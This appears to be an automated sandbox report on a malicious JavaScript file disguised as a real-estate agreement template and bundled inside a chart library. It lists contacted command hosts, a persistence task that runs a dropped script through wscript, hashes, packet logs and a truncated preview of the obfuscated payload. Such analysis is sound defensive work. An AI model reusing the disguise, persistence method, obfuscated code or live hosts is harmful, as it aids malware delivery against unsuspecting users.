            http://stackoverflow.com/questions/1573053/javascript-function-to-convert-color-names-to-hex-codesreal estate co ownership agreement template 43632.jsfalse
              		high
              http://paulirish.com/2011/requestanimationframe-for-smart-animating/real estate co ownership agreement template 43632.jsfalse
                		high
                http://www.cs.rit.edu/~ncs/color/t_convert.htmlreal estate co ownership agreement template 43632.jsfalse
                  		high
                  https://github.com/miguelmota/base64toblob/blob/master/base64toblob.jsreal estate co ownership agreement template 43632.jsfalse
                    		high
                    https://i-msdn.sec.s-msft.com/dynimg/IC267997.gifreal estate co ownership agreement template 43632.jsfalse
                      		high
                      https://github.com/nhn/tui.chart/issues/56)real estate co ownership agreement template 43632.jsfalse
                        		high
                        http://peltiertech.com/how-excel-calculates-automatic-chart-axis-limits/real estate co ownership agreement template 43632.jsfalse
                          		high
                          http://www.w3schools.com/HTML/html_colornames.aspreal estate co ownership agreement template 43632.jsfalse
                            		high
                            http://www.w3schools.com/svg/svg_path.aspreal estate co ownership agreement template 43632.jsfalse
                              		high

                              World Map of Contacted IPs

                              • No. of IPs < 25%
                              • 25% < No. of IPs < 50%
                              • 50% < No. of IPs < 75%
                              • 75% < No. of IPs

                              Public IPs

                              IPDomainCountryFlagASNASN NameMalicious
                              78.46.3.78
                              		weissenbach-pr.deGermany
                              		24940HETZNER-ASDEfalse
                              195.28.10.122
                              		memar98.comunknown
                              		201295MHOSTIRfalse
                              153.127.91.146
                              		tennoji-law-uranai.comJapan7684SAKURA-ASAKURAInternetIncJPfalse
                              91.198.66.211
                              		naturalanimals.netunknown
                              		43847NBISERV-ASDEfalse

                              General Information

                              Joe Sandbox version:40.0.0 Tourmaline
                              Analysis ID:1436909
                              Start date and time:2024-05-06 18:36:58 +02:00
                              Joe Sandbox product:CloudBasic
                              Overall analysis duration:0h 8m 38s
                              Hypervisor based Inspection enabled:false
                              Report type:full
                              Cookbook file name:default.jbs
                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                              Number of analysed new started processes analysed:26
                              Number of new started drivers analysed:0
                              Number of existing processes analysed:0
                              Number of existing drivers analysed:0
                              Number of injected processes analysed:0
                              Technologies:
                              • HCA enabled
                              • EGA enabled
                              • GSI enabled (Javascript)
                              • AMSI enabled
                              Analysis Mode:default
                              Analysis stop reason:Timeout
                              Sample name:real estate co ownership agreement template 43632.js
                              Detection:MAL
                              Classification:mal92.troj.expl.evad.winJS@13/9@4/4
                              EGA Information:Failed
                              HCA Information:
                              • Successful, ratio: 100%
                              • Number of executed functions: 0
                              • Number of non-executed functions: 0
                              Cookbook Comments:
                              • Found application associated with file extension: .js
                              • Override analysis time to 240s for JS/VBS files not yet terminated

                              Warnings

                              • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, MoUsoCoreWorker.exe, conhost.exe, backgroundTaskHost.exe, svchost.exe
                              • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
                              • Not all processes where analyzed, report is missing behavior information
                              • Report size getting too big, too many NtCreateKey calls found.
                              • Report size getting too big, too many NtOpenKeyEx calls found.
                              • Report size getting too big, too many NtProtectVirtualMemory calls found.
                              • Report size getting too big, too many NtQueryValueKey calls found.

                              Simulations

                              Behavior and APIs

                              TimeTypeDescription
                              19:50:30Task SchedulerRun new task: Enterprise Integration path: wscript s>DEVELO~1.JS
                              19:51:08API Interceptor298x Sleep call for process: powershell.exe modified

                              Joe Sandbox View / Context

                              IPs

                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                              195.28.10.122bad.jsGet hashmaliciousUnknownBrowse
                                bad.jsGet hashmaliciousUnknownBrowse
                                  153.127.91.146bad.jsGet hashmaliciousUnknownBrowse
                                    91.198.66.211bad.jsGet hashmaliciousUnknownBrowse

                                      Domains

                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                      naturalanimals.netbad.jsGet hashmaliciousUnknownBrowse
                                      • 91.198.66.211
                                      memar98.combad.jsGet hashmaliciousUnknownBrowse
                                      • 195.28.10.122
                                      bad.jsGet hashmaliciousUnknownBrowse
                                      • 195.28.10.122
                                      tennoji-law-uranai.combad.jsGet hashmaliciousUnknownBrowse
                                      • 153.127.91.146

                                      ASNs

                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                      NBISERV-ASDEbad.jsGet hashmaliciousUnknownBrowse
                                      • 91.198.66.211
                                      rmIjgsKayK.exeGet hashmaliciousRedLineBrowse
                                      • 91.198.77.158
                                      101.exeGet hashmaliciousBitRATBrowse
                                      • 31.185.104.20
                                      8674766007C7AED0B73283FB5003C4DF128699E9B8A2A.exeGet hashmaliciousnjRat, RedLineBrowse
                                      • 91.198.77.213
                                      33984A160916B4DF0B9F480ED4E7BB20C3C8D7DE49301.exeGet hashmaliciousRedLineBrowse
                                      • 91.198.77.213
                                      qmEMNM1AjN.exeGet hashmaliciousBitRATBrowse
                                      • 31.185.104.21
                                      25hBQ7XDkh.exeGet hashmaliciousBitRAT XmrigBrowse
                                      • 31.185.104.19
                                      tinynuke.exeGet hashmaliciousTinynuke / NukebotBrowse
                                      • 31.185.104.21
                                      UP34reqgZq.dllGet hashmaliciousDanaBotBrowse
                                      • 31.185.104.19
                                      VCJQWUG1iY.exeGet hashmaliciousUnknownBrowse
                                      • 31.185.104.20
                                      HETZNER-ASDEhttp://195.242.110.135Get hashmaliciousUnknownBrowse
                                      • 135.181.16.82
                                      B7xLbK5dVh.exeGet hashmaliciousRedLineBrowse
                                      • 116.203.6.63
                                      Di2UVsYM0u.exeGet hashmaliciousRedLineBrowse
                                      • 116.203.6.63
                                      ISVVL7A4in.exeGet hashmaliciousRedLineBrowse
                                      • 116.203.6.63
                                      HTMYKAFISF.exeGet hashmaliciousRedLineBrowse
                                      • 116.203.6.63
                                      LP9dobIckp.exeGet hashmaliciousPureLog Stealer, RedLineBrowse
                                      • 116.203.6.63
                                      SecuriteInfo.com.Win64.PWSX-gen.27230.12502.exeGet hashmaliciousFormBookBrowse
                                      • 116.203.164.244
                                      3eK5m977AY.exeGet hashmaliciousPureLog Stealer, RedLineBrowse
                                      • 116.203.6.63
                                      78nLQ1ShbV.exeGet hashmaliciousPureLog Stealer, RedLineBrowse
                                      • 116.203.6.63
                                      IHGA1XNVtd.exeGet hashmaliciousPureLog Stealer, RedLineBrowse
                                      • 116.203.6.63
                                      SAKURA-ASAKURAInternetIncJPNHhH776.exeGet hashmaliciousFormBookBrowse
                                      • 153.126.217.112
                                      bad.jsGet hashmaliciousUnknownBrowse
                                      • 153.127.91.146
                                      hCGaMRj2il.elfGet hashmaliciousMiraiBrowse
                                      • 153.120.57.229
                                      BMJzumU0MX.elfGet hashmaliciousMiraiBrowse
                                      • 153.120.10.224
                                      uUtyJqyRqT.exeGet hashmaliciousUrelasBrowse
                                      • 133.242.129.155
                                      uUtyJqyRqT.exeGet hashmaliciousUrelasBrowse
                                      • 133.242.129.155
                                      ktMLmEUY2l.elfGet hashmaliciousMiraiBrowse
                                      • 133.125.49.216
                                      VlkShT2TjD.elfGet hashmaliciousGafgytBrowse
                                      • 133.242.175.111
                                      1AIemYSAZy.exeGet hashmaliciousGlupteba, LummaC Stealer, SmokeLoader, StealcBrowse
                                      • 133.242.174.157
                                      ZXjGgZGvWB.elfGet hashmaliciousUnknownBrowse
                                      • 153.120.57.228
                                      MHOSTIRbad.jsGet hashmaliciousUnknownBrowse
                                      • 195.28.10.122
                                      bad.jsGet hashmaliciousUnknownBrowse
                                      • 195.28.10.122
                                      E-dekont.pdf.exeGet hashmaliciousFormBook, NSISDropperBrowse
                                      • 185.252.29.160
                                      url.exeGet hashmaliciousUnknownBrowse
                                      • 185.252.29.62
                                      UrQrIdRfCg.exeGet hashmaliciousUnknownBrowse
                                      • 185.252.29.210
                                      https://firebasestorage.googleapis.com/v0/b/papaya-398f2.appspot.com/o/Fazbaze.html?alt=media&token=53b0c52d-e20f-49b2-a92e-082ad8874351#marym@steinborn.comGet hashmaliciousHTMLPhisherBrowse
                                      • 185.252.29.161
                                      759279720662.exeGet hashmaliciousSnake KeyloggerBrowse
                                      • 185.252.31.60

                                      JA3 Fingerprints

                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                      3b5074b1b5d032e5620f69f9f700ff0ePO#AL231108.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                      • 195.28.10.122
                                      • 78.46.3.78
                                      • 153.127.91.146
                                      • 91.198.66.211
                                      B7xLbK5dVh.exeGet hashmaliciousRedLineBrowse
                                      • 195.28.10.122
                                      • 78.46.3.78
                                      • 153.127.91.146
                                      • 91.198.66.211
                                      Di2UVsYM0u.exeGet hashmaliciousRedLineBrowse
                                      • 195.28.10.122
                                      • 78.46.3.78
                                      • 153.127.91.146
                                      • 91.198.66.211
                                      ISVVL7A4in.exeGet hashmaliciousRedLineBrowse
                                      • 195.28.10.122
                                      • 78.46.3.78
                                      • 153.127.91.146
                                      • 91.198.66.211
                                      HTMYKAFISF.exeGet hashmaliciousRedLineBrowse
                                      • 195.28.10.122
                                      • 78.46.3.78
                                      • 153.127.91.146
                                      • 91.198.66.211
                                      NEW SAMPLE ORDER.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                      • 195.28.10.122
                                      • 78.46.3.78
                                      • 153.127.91.146
                                      • 91.198.66.211
                                      Move Mouse.exeGet hashmaliciousUnknownBrowse
                                      • 195.28.10.122
                                      • 78.46.3.78
                                      • 153.127.91.146
                                      • 91.198.66.211
                                      IMG_77020316.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                      • 195.28.10.122
                                      • 78.46.3.78
                                      • 153.127.91.146
                                      • 91.198.66.211
                                      LP9dobIckp.exeGet hashmaliciousPureLog Stealer, RedLineBrowse
                                      • 195.28.10.122
                                      • 78.46.3.78
                                      • 153.127.91.146
                                      • 91.198.66.211
                                      pjadkins wbfosson.com shared _Indirect Solutions LLC_ with you.emlGet hashmaliciousHTMLPhisherBrowse
                                      • 195.28.10.122
                                      • 78.46.3.78
                                      • 153.127.91.146
                                      • 91.198.66.211

                                      Dropped Files

                                      No context

                                      Created / dropped Files

                                      C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                                      Download File
                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):19604
                                      Entropy (8bit):5.00909775372993
                                      Encrypted:false
                                      SSDEEP:384:N1YyYooXVoGIpN6KQkj2SNXp5adzOdBn+ib42hQozkjh4iUxjKIeYYib4J:N1YyYooXV3IpNBQkj2SNZ4dzOdBnbhFi
                                      MD5:6FBB062EBBE4AF22E35BB4D6602E4A14
                                      SHA1:86FDA247F9F9F0D33DDC0887D79E643244FA7AFD
                                      SHA-256:3A98CE52CBBEC2CE96DD7CF43386433E5E03D2E7B3A40A94166F6F807D38F79E
                                      SHA-512:4D842084F0C8998882E4F9F3D79FA26DD0359A80C721E21FAD0EFBD3ADCA00FB276867428764C63F270201E4A8EB1456F67C85310964B176CE0881EA242C1FA9
                                      Malicious:false
                                      Reputation:low
                                      Preview:PSMODULECACHE..........z..I...C:\Program Files (x86)\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........AfterEach........Should........BeforeEach........Get-MockDynamicParameters........It........Assert-VerifiableMocks........BeforeAll........Context........Set-TestInconclusive........AfterAll........Setup........Set-DynamicParameterVariables........Invoke-Pester........Assert-MockCalled........New-PesterOption......... h..z..K...C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\PSReadLine.psm1........PSConsoleHostReadLine........Get-PSReadLineOption........Set-PSReadLineKeyHandler........Get-PSReadLineKeyHandler........Set-PSReadLineOption........Remove-PSReadLineKeyHandler.............z..I...C:\Program Files (x86)\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psm1........SafeGetCommand........Get-ScriptBlockScope....$...Get-D

                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_aawxunxv.snq.psm1

                                      Download File
                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:ASCII text, with no line terminators
                                      Category:dropped
                                      Size (bytes):60
                                      Entropy (8bit):4.038920595031593
                                      Encrypted:false
                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                      Malicious:false
                                      Reputation:high, very likely benign file
                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fffj2uvs.1yt.ps1

                                      Download File
                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:ASCII text, with no line terminators
                                      Category:dropped
                                      Size (bytes):60
                                      Entropy (8bit):4.038920595031593
                                      Encrypted:false
                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                      Malicious:false
                                      Reputation:high, very likely benign file
                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ghzyr50j.wtq.psm1

                                      Download File
                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:ASCII text, with no line terminators
                                      Category:dropped
                                      Size (bytes):60
                                      Entropy (8bit):4.038920595031593
                                      Encrypted:false
                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                      Malicious:false
                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_pcptwxly.kgo.ps1

                                      Download File
                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:ASCII text, with no line terminators
                                      Category:dropped
                                      Size (bytes):60
                                      Entropy (8bit):4.038920595031593
                                      Encrypted:false
                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                      Malicious:false
                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_pobdjaxn.4hw.ps1

                                      Download File
                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:ASCII text, with no line terminators
                                      Category:dropped
                                      Size (bytes):60
                                      Entropy (8bit):4.038920595031593
                                      Encrypted:false
                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                      Malicious:false
                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rlj2rpy5.0iz.psm1

                                      Download File
                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:ASCII text, with no line terminators
                                      Category:dropped
                                      Size (bytes):60
                                      Entropy (8bit):4.038920595031593
                                      Encrypted:false
                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                      Malicious:false
                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                      C:\Users\user\AppData\Roaming\com.adobe.dunamis\Developer Services.js (copy)

                                      Download File
                                      Process:C:\Windows\System32\wscript.exe
                                      File Type:ASCII text, with very long lines (65536), with no line terminators
                                      Category:dropped
                                      Size (bytes):47678072
                                      Entropy (8bit):5.666828597866191
                                      Encrypted:false
                                      SSDEEP:49152:o00000000000000000000000000000000000000000000000000000000000000D:m
                                      MD5:B047C450583F3973C5AA3B23D7FC433B
                                      SHA1:7896DF127A2C92F3B2096B159052908EDBF8EFFD
                                      SHA-256:74AD0A8508F1B2849A9B640F043BE3670BD4C3ECB29E5A67067D0C764ED5E805
                                      SHA-512:128D892EF068BDEEFA2166574C27C71A6C7B75A117BDEF77462085A87CEE85094988B766D79B539B6F48A270808E55B73106FA7B203D82B3628938D4281EE4A4
                                      Malicious:false
                                      Preview:650560617905821433189172285812437710244084907636;singlen='*+B?3??.4I+w,E?E8Awb4u';function goldh(bsvgh, jzbnr){return yellow2(bsvgh,jzbnr,yyvt);}developm = 8160;yfkxy='?+tEE?ieceo?Trt) e/+nh?(';bad9='B+(Ow??k?hHj+c?f??)[k++5o?(?';function cufo(hcky, playy, beautym, lead9){bgscfidk = speech8+ayenh+clockr+cat6+kcxzba+uukspz+ysujl+beat7+vmyp+ovdfk+industry8+sing8+state6+flywju+kbfko+mvyaeqw+geyui+bidjywh+book6+guessv+iczn+realg+kusay+keep0+dwwk+lqhbc+ozkqck+justi+eight4+vyynf+pquw+morning8+hhdvgv5+electric2+wppel+qhjxf+suitr+spknjb+rub8+kidow+neckqh+youngn;wire8[30660] = gentle8;thought3(developm);}land6='O+)(C\\?\"o2+?L*?+ 3(?=4Mi ,As[8E\\?\"R';yyvt = 1;cold7='?o|)1iW)?s?;+s+U?e?[[\\h\"eie+?[r\\+\"El?r{]';function btwm(ports, much8) {noise1 = pair7(much8);for (yychlml = (boardy); yychlml<=pair7(ports)-noise1; yychlml++) {if (yellow2(ports,yychlml,noise1)==much8){plainq[pair7(plainq)] = yellow2(ports,dkvebx2,yychlml-dkvebx2);dkvebx2 = yychlml+noise1;}}plainq[pair7(plainq)] = yellow2(ports

                                      C:\Users\user\AppData\Roaming\com.adobe.dunamis\Golf Club Repair.dat

                                      Download File
                                      Process:C:\Windows\System32\wscript.exe
                                      File Type:ASCII text, with very long lines (65536), with no line terminators
                                      Category:dropped
                                      Size (bytes):47678072
                                      Entropy (8bit):5.666828597866191
                                      Encrypted:false
                                      SSDEEP:49152:o00000000000000000000000000000000000000000000000000000000000000D:m
                                      MD5:B047C450583F3973C5AA3B23D7FC433B
                                      SHA1:7896DF127A2C92F3B2096B159052908EDBF8EFFD
                                      SHA-256:74AD0A8508F1B2849A9B640F043BE3670BD4C3ECB29E5A67067D0C764ED5E805
                                      SHA-512:128D892EF068BDEEFA2166574C27C71A6C7B75A117BDEF77462085A87CEE85094988B766D79B539B6F48A270808E55B73106FA7B203D82B3628938D4281EE4A4
                                      Malicious:false
                                      Preview:650560617905821433189172285812437710244084907636;singlen='*+B?3??.4I+w,E?E8Awb4u';function goldh(bsvgh, jzbnr){return yellow2(bsvgh,jzbnr,yyvt);}developm = 8160;yfkxy='?+tEE?ieceo?Trt) e/+nh?(';bad9='B+(Ow??k?hHj+c?f??)[k++5o?(?';function cufo(hcky, playy, beautym, lead9){bgscfidk = speech8+ayenh+clockr+cat6+kcxzba+uukspz+ysujl+beat7+vmyp+ovdfk+industry8+sing8+state6+flywju+kbfko+mvyaeqw+geyui+bidjywh+book6+guessv+iczn+realg+kusay+keep0+dwwk+lqhbc+ozkqck+justi+eight4+vyynf+pquw+morning8+hhdvgv5+electric2+wppel+qhjxf+suitr+spknjb+rub8+kidow+neckqh+youngn;wire8[30660] = gentle8;thought3(developm);}land6='O+)(C\\?\"o2+?L*?+ 3(?=4Mi ,As[8E\\?\"R';yyvt = 1;cold7='?o|)1iW)?s?;+s+U?e?[[\\h\"eie+?[r\\+\"El?r{]';function btwm(ports, much8) {noise1 = pair7(much8);for (yychlml = (boardy); yychlml<=pair7(ports)-noise1; yychlml++) {if (yellow2(ports,yychlml,noise1)==much8){plainq[pair7(plainq)] = yellow2(ports,dkvebx2,yychlml-dkvebx2);dkvebx2 = yychlml+noise1;}}plainq[pair7(plainq)] = yellow2(ports

                                      Static File Info

                                      General

                                      File type:ASCII text, with very long lines (665)
                                      Entropy (8bit):4.857037242536753
                                      TrID:
                                      • Visual Basic Script (13500/0) 51.92%
                                      • Java Script (8502/1) 32.70%
                                      • Digital Micrograph Script (4001/1) 15.39%
                                      File name:real estate co ownership agreement template 43632.js
                                      File size:1'759'107 bytes
                                      MD5:e4c20aa2c3a182ea923c56200099bcc7
                                      SHA1:e43d499f2ac4a5d52629226e479464806049bb02
                                      SHA256:81aaaa98308c50ff79d2680d0c1840a05e3ac3c0255166da047ed77073dc8458
                                      SHA512:bdf4f3e17239e07a93eaf7fbdbac15022883c15d82505ead0c912041905e0838e03752cc8842c43824e1d9c3c1d1fcbef0ee835a3418ea5e2232648bcd3a179e
                                      SSDEEP:12288:SeFTYbhfw4Y/Zz2z+FIE5AlQlDu90TsDJWx5u1xNydLpg8hC6gQl6GfwgqqQkv2N:SeGbhfj8aWHu1/wD5HroObm
                                      TLSH:C885B749FBD05101B867729D4E9F708EE27C501FB941AC88BD4CA8A43F9A22457EEF74
                                      File Content Preview:/*!. * tui-chart. * @fileoverview tui-chart. * @author NHN. FE Development Lab <dl_javascript@nhn.com>. * @version 3.11.3. * @license MIT. * @link https://github.com/nhn/tui.chart. * bundle created at "Fri Jan 29 2021 15:51:40 GMT+0900 (Korean Standard Ti

                                      File Icon

                                      Icon Hash:68d69b8bb6aa9a86

                                      Network Behavior

                                      Network Port Distribution

                                      TCP Packets

                                      TimestampSource PortDest PortSource IPDest IP
                                      May 6, 2024 18:41:16.689191103 CEST49708443192.168.2.791.198.66.211
                                      May 6, 2024 18:41:16.689234018 CEST4434970891.198.66.211192.168.2.7
                                      May 6, 2024 18:41:16.689316034 CEST49708443192.168.2.791.198.66.211
                                      May 6, 2024 18:41:16.696229935 CEST49708443192.168.2.791.198.66.211
                                      May 6, 2024 18:41:16.696247101 CEST4434970891.198.66.211192.168.2.7
                                      May 6, 2024 18:41:17.249629021 CEST4434970891.198.66.211192.168.2.7
                                      May 6, 2024 18:41:17.249710083 CEST49708443192.168.2.791.198.66.211
                                      May 6, 2024 18:41:17.254089117 CEST49708443192.168.2.791.198.66.211
                                      May 6, 2024 18:41:17.254101038 CEST4434970891.198.66.211192.168.2.7
                                      May 6, 2024 18:41:17.254381895 CEST4434970891.198.66.211192.168.2.7
                                      May 6, 2024 18:41:17.287559032 CEST49708443192.168.2.791.198.66.211
                                      May 6, 2024 18:41:17.287615061 CEST4434970891.198.66.211192.168.2.7
                                      May 6, 2024 18:41:19.330209017 CEST4434970891.198.66.211192.168.2.7
                                      May 6, 2024 18:41:19.330353975 CEST4434970891.198.66.211192.168.2.7
                                      May 6, 2024 18:41:19.330449104 CEST49708443192.168.2.791.198.66.211
                                      May 6, 2024 18:41:19.344510078 CEST49708443192.168.2.791.198.66.211
                                      May 6, 2024 18:41:40.400286913 CEST49709443192.168.2.778.46.3.78
                                      May 6, 2024 18:41:40.400319099 CEST4434970978.46.3.78192.168.2.7
                                      May 6, 2024 18:41:40.400420904 CEST49709443192.168.2.778.46.3.78
                                      May 6, 2024 18:41:40.400880098 CEST49709443192.168.2.778.46.3.78
                                      May 6, 2024 18:41:40.400892019 CEST4434970978.46.3.78192.168.2.7
                                      May 6, 2024 18:41:40.852782011 CEST49710443192.168.2.7195.28.10.122
                                      May 6, 2024 18:41:40.852828979 CEST44349710195.28.10.122192.168.2.7
                                      May 6, 2024 18:41:40.852948904 CEST49710443192.168.2.7195.28.10.122
                                      May 6, 2024 18:41:40.856355906 CEST49710443192.168.2.7195.28.10.122
                                      May 6, 2024 18:41:40.856365919 CEST44349710195.28.10.122192.168.2.7
                                      May 6, 2024 18:41:40.864002943 CEST4434970978.46.3.78192.168.2.7
                                      May 6, 2024 18:41:40.864115953 CEST49709443192.168.2.778.46.3.78
                                      May 6, 2024 18:41:40.865767956 CEST49709443192.168.2.778.46.3.78
                                      May 6, 2024 18:41:40.865776062 CEST4434970978.46.3.78192.168.2.7
                                      May 6, 2024 18:41:40.866038084 CEST4434970978.46.3.78192.168.2.7
                                      May 6, 2024 18:41:40.867285013 CEST49709443192.168.2.778.46.3.78
                                      May 6, 2024 18:41:40.867332935 CEST4434970978.46.3.78192.168.2.7
                                      May 6, 2024 18:41:41.467959881 CEST44349710195.28.10.122192.168.2.7
                                      May 6, 2024 18:41:41.468055010 CEST49710443192.168.2.7195.28.10.122
                                      May 6, 2024 18:41:41.469757080 CEST49710443192.168.2.7195.28.10.122
                                      May 6, 2024 18:41:41.469769001 CEST44349710195.28.10.122192.168.2.7
                                      May 6, 2024 18:41:41.470185995 CEST44349710195.28.10.122192.168.2.7
                                      May 6, 2024 18:41:41.479754925 CEST49710443192.168.2.7195.28.10.122
                                      May 6, 2024 18:41:41.479799986 CEST44349710195.28.10.122192.168.2.7
                                      May 6, 2024 18:41:41.954718113 CEST4434970978.46.3.78192.168.2.7
                                      May 6, 2024 18:41:41.954799891 CEST4434970978.46.3.78192.168.2.7
                                      May 6, 2024 18:41:41.954960108 CEST49709443192.168.2.778.46.3.78
                                      May 6, 2024 18:41:41.956123114 CEST49709443192.168.2.778.46.3.78
                                      May 6, 2024 18:41:42.057296991 CEST44349710195.28.10.122192.168.2.7
                                      May 6, 2024 18:41:42.057467937 CEST44349710195.28.10.122192.168.2.7
                                      May 6, 2024 18:41:42.057620049 CEST49710443192.168.2.7195.28.10.122
                                      May 6, 2024 18:41:42.059864044 CEST49710443192.168.2.7195.28.10.122
                                      May 6, 2024 18:42:02.888011932 CEST49712443192.168.2.7153.127.91.146
                                      May 6, 2024 18:42:02.888011932 CEST49711443192.168.2.7153.127.91.146
                                      May 6, 2024 18:42:02.888051987 CEST44349712153.127.91.146192.168.2.7
                                      May 6, 2024 18:42:02.888057947 CEST44349711153.127.91.146192.168.2.7
                                      May 6, 2024 18:42:02.888149023 CEST49712443192.168.2.7153.127.91.146
                                      May 6, 2024 18:42:02.888149023 CEST49711443192.168.2.7153.127.91.146
                                      May 6, 2024 18:42:02.888465881 CEST49712443192.168.2.7153.127.91.146
                                      May 6, 2024 18:42:02.888515949 CEST44349712153.127.91.146192.168.2.7
                                      May 6, 2024 18:42:02.888526917 CEST49711443192.168.2.7153.127.91.146
                                      May 6, 2024 18:42:02.888540030 CEST44349711153.127.91.146192.168.2.7
                                      May 6, 2024 18:42:03.817152977 CEST44349712153.127.91.146192.168.2.7
                                      May 6, 2024 18:42:03.817249060 CEST49712443192.168.2.7153.127.91.146
                                      May 6, 2024 18:42:03.818933964 CEST49712443192.168.2.7153.127.91.146
                                      May 6, 2024 18:42:03.818948984 CEST44349712153.127.91.146192.168.2.7
                                      May 6, 2024 18:42:03.819266081 CEST44349712153.127.91.146192.168.2.7
                                      May 6, 2024 18:42:03.822285891 CEST49712443192.168.2.7153.127.91.146
                                      May 6, 2024 18:42:03.822328091 CEST44349712153.127.91.146192.168.2.7
                                      May 6, 2024 18:42:03.834815025 CEST44349711153.127.91.146192.168.2.7
                                      May 6, 2024 18:42:03.834907055 CEST49711443192.168.2.7153.127.91.146
                                      May 6, 2024 18:42:03.836616993 CEST49711443192.168.2.7153.127.91.146
                                      May 6, 2024 18:42:03.836627960 CEST44349711153.127.91.146192.168.2.7
                                      May 6, 2024 18:42:03.840439081 CEST44349711153.127.91.146192.168.2.7
                                      May 6, 2024 18:42:03.841886997 CEST49711443192.168.2.7153.127.91.146
                                      May 6, 2024 18:42:03.841936111 CEST44349711153.127.91.146192.168.2.7
                                      May 6, 2024 18:42:04.744921923 CEST44349712153.127.91.146192.168.2.7
